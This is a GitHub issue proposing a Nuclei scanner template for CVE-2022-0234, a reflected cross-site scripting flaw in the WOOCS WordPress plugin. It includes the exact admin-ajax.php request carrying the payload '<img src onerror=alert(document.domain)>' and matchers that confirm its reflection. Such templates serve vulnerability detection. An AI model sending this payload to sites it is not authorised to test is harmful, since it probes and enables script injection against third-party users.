### ISSUE TITLE
CVE-2022-0234

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4281]
```yaml
id: CVE-2022-0234

info:
  name: WOOCS < 1.3.7.5 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b
  tags: xss,wp,wordpress,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img src onerror=alert(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
